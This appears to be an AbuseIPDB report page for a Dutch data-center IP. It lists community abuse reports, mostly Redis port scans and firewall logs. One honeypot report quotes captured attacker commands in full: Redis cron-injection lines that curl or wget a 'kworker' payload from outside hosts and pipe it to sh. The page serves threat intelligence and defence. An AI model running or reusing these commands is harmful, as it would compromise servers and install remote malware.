JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 136.144.253.66

136.144.253.66 was found in our database!

This IP was reported 57 times. Confidence of Abuse is 29%: ?

29%

ISP	TRANSIP 136 144 192 0
Usage Type	Data Center/Web Hosting/Transit
ASN	AS20857
Hostname(s)	136-144-253-66.colo.transip.net
Domain Name	transip.nl
Country	🇳🇱 Netherlands
City	Lelystad, Flevoland

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 136.144.253.66

Whois 136.144.253.66

IP Abuse Reports for 136.144.253.66:

This IP address has been reported a total of 57 times from 38 distinct sources. 136.144.253.66 was first reported on March 27th 2026, and the most recent report was 1 month ago.

Old Reports: The most recent abuse report for this IP address is from 1 month ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇮🇳 evicky2002	2026-04-29 18:28:29 (1 month ago)	Confirmed malicious by STILWaters CTI (score=100)	Hacking Brute-Force SSH
🇫🇮 nNordic	2026-04-26 09:19:38 (1 month ago)	Connection attempt blocked by IDS/IPS from 136.144.253.66/32	Hacking
🇫🇮 nNordic	2026-04-25 08:35:41 (1 month ago)	Connection attempt blocked by IDS/IPS from 136.144.253.66/32	Hacking
🇬🇷 Xev	2026-04-13 15:00:44 (1 month ago)	Redis command execution Date: 2026-04-13 14:11:26 UTC Destination port: 6379 Executed commands: fl ... show more Redis command execution Date: 2026-04-13 14:11:26 UTC Destination port: 6379 Executed commands: flushall set backup1 /2 * * * cd1 -fsSL http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker \| sh set backup2 /3 * * * wget -q -O- http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker \| sh set backup3 /4 * * * curl -fsSL http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker \| sh set backup4 /5 * * * wd1 -q -O- http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker \| sh config set dir /var/spool/cron/ config set dir /var/spool/cron/crontabs flushall set backup1 /2 * * * root cd1 -fsSL http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker \| sh set backup2 /3 * * * root wget -q -O- http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker \| sh set backup3 /4 * * * root curl -fsSL http://38.150.0.118/dewfhuewr4r89/98hy67//kworker \| sh set backup4 /5 * * * root wd1 -q -O- http://34.70.205.211... show less	IoT Targeted
🇸🇰 GOVCERT	2026-04-13 08:09:25 (1 month ago)	Sweep Scan	Port Scan
🇨🇭 SOC [GOLINE SA]	2026-04-13 08:03:07 (1 month ago)	IDS Alert: ET CINS Active Threat Intelligence Poor Reputation IP group 193 === ATTACK === Signature: ... show more IDS Alert: ET CINS Active Threat Intelligence Poor Reputation IP group 193 === ATTACK === Signature: ET CINS Active Threat Intelligence Poor Reputation IP group 193 \| SID: 2403492 \| Severity: 2 \| Category: Misc Attack === SOURCE === IP: 136.144.253.66 (IPv4) \| Port: 60538 \| Country: Netherlands \| ISP: Unknown \| rDNS: 136-144-253-66.colo.transip.net === TARGET === Host: insightvm.goline.ch \| IP: 185.54.80.24 \| Port: 6379 \| Protocol: TCP \| App: N/A === RESPONSE === Time: 2026-04-13 10:03:04 \| Action: Blocked show less	Exploited Host Hacking
🇩🇪 heyzg	2026-04-13 01:34:56 (1 month ago)	HTTP honeypot \| Command Execution \| 3 cmds, 2 HTTP, 9s	Hacking SSH
🇫🇷 Duggy_Tuxy🧱	2026-04-12 22:11:43 (1 month ago)	[HP01-SRV01-FR] Blocked by SysWarden Firewall (Database/Cache Attack)	Port Scan Hacking Brute-Force
🇷🇺 genokrad	2026-04-12 19:06:46 (1 month ago)	Unauthorized connection attempt on TCP/6379 (Redis)	Port Scan
🇨🇭 Elysium Security	2026-04-12 10:30:19 (1 month ago)	Mass port scanning on a whole network	Port Scan
🇫🇮 iamxorum	2026-04-12 01:23:37 (1 month ago)	2026-04-12T01:23:37.144683+00:00 XRM-01 kernel: [HONEYPORT] IN=eth0 OUT= MAC=92:00:06:e6:da:95:d2:74 ... show more 2026-04-12T01:23:37.144683+00:00 XRM-01 kernel: [HONEYPORT] IN=eth0 OUT= MAC=92:00:06:e6:da:95:d2:74:7f:6e:37:e3:08:00 SRC=136.144.253.66 DST=46.62.222.43 LEN=60 TOS=0x00 PREC=0x00 TTL=52 ID=23188 DF PROTO=TCP SPT=40500 DPT=6379 WINDOW=64240 RES=0x00 SYN URGP=0 ... show less	Port Scan
🇺🇸 donarev419	2026-04-12 00:04:20 (1 month ago)	Connection to port 6379 with data transfer. Data preview: *1 $4 info	Port Scan Hacking
🇦🇹 Pingger Shikkoken	2026-04-11 16:01:57 (1 month ago)	2026-04-11T16:01:57+00:00 iskariot kernel: AbuseIPDB-Blacklist-Dropped: IN=ens3 OUT= MAC=b6:ab:74:e6 ... show more 2026-04-11T16:01:57+00:00 iskariot kernel: AbuseIPDB-Blacklist-Dropped: IN=ens3 OUT= MAC=b6:ab:74:e6:2e:14:84:03:28:62:88:32:08:00 SRC=136.144.253.66 DST=152.53.50.28 LEN=60 TOS=0x00 PREC=0x00 TTL=50 ID=4504 DF PROTO=TCP SPT=33644 DPT=6379 WINDOW=64240 RES=0x00 SYN URGP=0 show less	Hacking
🇦🇹 centurion	2026-04-11 16:01:49 (1 month ago)	Unauthorized attempt on siem [6379/tcp] Source port: 34462 TTL: 50 Packet length: 60 TOS: 0x00 https ... show more Unauthorized attempt on siem [6379/tcp] Source port: 34462 TTL: 50 Packet length: 60 TOS: 0x00 https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan
🇨🇭 pingusurmars	2026-04-11 15:10:10 (1 month ago)	Blocked by UFW on ampereone [6379/tcp] Source port: 37646 TTL: 55 Packet length: 60 TOS: 0x00 This ... show more Blocked by UFW on ampereone [6379/tcp] Source port: 37646 TTL: 55 Packet length: 60 TOS: 0x00 This report was generated by: https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan

Showing 1 to 15 of 57 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇯🇵 172.235.206.214

🇿🇦 169.1.89.99

🇳🇱 138.199.7.237

🇨🇳 106.89.59.14

🇩🇪 69.5.169.43

🇺🇸 35.192.144.4

🇺🇸 18.205.127.11

🇰🇷 211.240.117.40

🇲🇽 189.163.4.223

🇫🇷 185.177.72.68

🇭🇰 123.58.213.117

🇫🇷 109.123.247.52

🇭🇰 103.43.191.43

🇨🇦 85.217.149.56

🇰🇷 59.8.50.83

🇲🇾 51.162.194.94

🇲🇾 49.124.152.242

🇺🇸 34.27.48.239

🇩🇪 217.181.86.202

🇺🇸 195.184.76.205